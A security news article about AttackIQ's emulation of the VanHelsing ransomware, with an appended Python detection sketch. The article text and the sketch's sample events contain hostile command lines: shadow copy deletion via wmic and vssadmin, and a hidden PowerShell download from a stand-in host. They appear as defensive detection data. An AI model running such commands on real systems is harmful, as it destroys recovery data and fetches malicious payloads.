Cybersecurity researchers at AttackIQ have meticulously emulated the intricate tactics, techniques, and procedures (TTPs) of the VanHelsing ransomware, a potent ransomware-as-a-service (RaaS) operation that surfaced in March 2025.
This cyber threat has rapidly gained notoriety within the cybercriminal underworld for its advanced cross-platform capabilities and aggressive double extortion model.
VanHelsing targets a wide array of systems, including Windows, Linux, BSD, ARM devices, and VMware ESXi environments, encrypting files with sophisticated algorithms like Curve25519 and ChaCha20, and appending the “.vanhelsing” extension to affected files.
Beyond encryption, it exfiltrates sensitive data, threatening to leak it on a public site if ransoms, demanded in Bitcoin, are not paid.
With a reported $5,000 entry deposit for affiliates who retain 80% of ransom payments, VanHelsing’s operation has already impacted five victims across the US, France, Italy, and Australia as of May 14, 2025, with data from three victims exposed on their leak site.
Unveiling a Sophisticated Cyber Threat
AttackIQ’s newly released attack graph, based on insights from Check Point’s March 23, 2025 report, replicates VanHelsing’s behavioral patterns to help organizations validate their security controls against this evolving threat.
The emulation covers critical stages of the ransomware’s attack chain, from initial access and discovery to file encryption and system impact.

During the initial phase, VanHelsing performs local system reconnaissance using techniques like Virtualization/Sandbox Evasion (T1497) via the IsDebuggerPresent API to avoid detection, alongside System Location Discovery (T1614) through calls like GetUserDefaultLCID to identify unintended targets.
It also employs Ingress Tool Transfer (T1105) to download malicious payloads, testing endpoint and network defenses.
In the impact stage, the ransomware inhibits recovery by deleting Volume Shadow Copies (T1490) using commands like “wmic shadowcopy delete,” scans for network shares (T1135), and encrypts files using a hybrid of ChaCha20 and Elliptic-curve Diffie-Hellman (ECDH) over Curve25519 (T1486).
Emulating Real-World Adversarial Behavior
AttackIQ’s simulation enables security teams to assess their detection and prevention pipelines against these real-world adversarial behaviors, offering actionable insights into vulnerabilities.

Furthermore, the platform recommends additional scenarios like lateral movement emulation via PAExec to extend testing capabilities, ensuring a comprehensive defense posture against opportunistic adversaries like VanHelsing that indiscriminately select targets.
This initiative by AttackIQ, a leader in Adversarial Exposure Validation (AEV) aligned with the Continuous Threat Exposure Management (CTEM) framework, underscores the urgency of proactive cybersecurity.
By providing tools to evaluate security control performance and offering detection signatures for malicious activities (such as PowerShell commands for payload downloads or “vssadmin Delete Shadows” for shadow copy deletion), their platform empowers organizations to mitigate risks using strategies like network intrusion prevention (M1031) and robust data backups (M1053).
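As an added example, and not code from AttackIQ or its detection signatures, the following Python sketch runs simple rules over constructed process-creation events to flag the shadow copy deletion commands quoted in the impact stage (T1490) and PowerShell payload downloads (T1105) named above; the event fields, the sample command lines and the specific PowerShell download cmdlets matched are assumptions.

```python
import re

# Constructed sample process-creation events (not real telemetry); the fields
# mirror what an EDR or Sysmon Event ID 1 record would carry.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": "wmic  shadowcopy delete"},
    {"host": "ws01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin Delete Shadows /All /Quiet"},
    {"host": "ws02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -nop -w hidden -c "Invoke-WebRequest http://example.invalid/p.bin '
            '-OutFile C:\\Users\\Public\\p.bin"'},
    {"host": "ws02", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin list shadows"},  # benign: listing, not deleting
    {"host": "ws03", "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
]

# Each rule: ATT&CK technique from the write-up, a pattern over the normalised
# command line, and a short label for the alert. The download cmdlet list is an
# assumption, not something the write-up enumerates.
RULES = [
    ("T1490", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b"),
     "vssadmin shadow copy deletion"),
    ("T1490", re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b"),
     "wmic shadow copy deletion"),
    ("T1105", re.compile(r"\bpowershell(\.exe)?\b.*"
                         r"(invoke-webrequest|iwr|downloadfile|downloadstring|"
                         r"start-bitstransfer|curl|wget)\b.*\bhttps?://"),
     "PowerShell payload download"),
]


def normalise(cmd: str) -> str:
    """Lower-case and collapse whitespace so casing or padding does not evade the match."""
    return re.sub(r"\s+", " ", cmd).strip().lower()


def match_event(event: dict) -> list:
    """Return (technique, label) pairs for every rule the event's command line matches."""
    cmd = normalise(event["cmd"])
    return [(tid, label) for tid, pat, label in RULES if pat.search(cmd)]


def scan(events: list) -> list:
    """Run all rules over a batch of events; each hit is (host, technique, label)."""
    return [(e["host"], tid, label) for e in events for tid, label in match_event(e)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```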
As VanHelsing continues to evolve, such emulations are critical for bolstering defenses, ensuring that security teams can prioritize key techniques and continuously refine their response to this dangerous ransomware threat.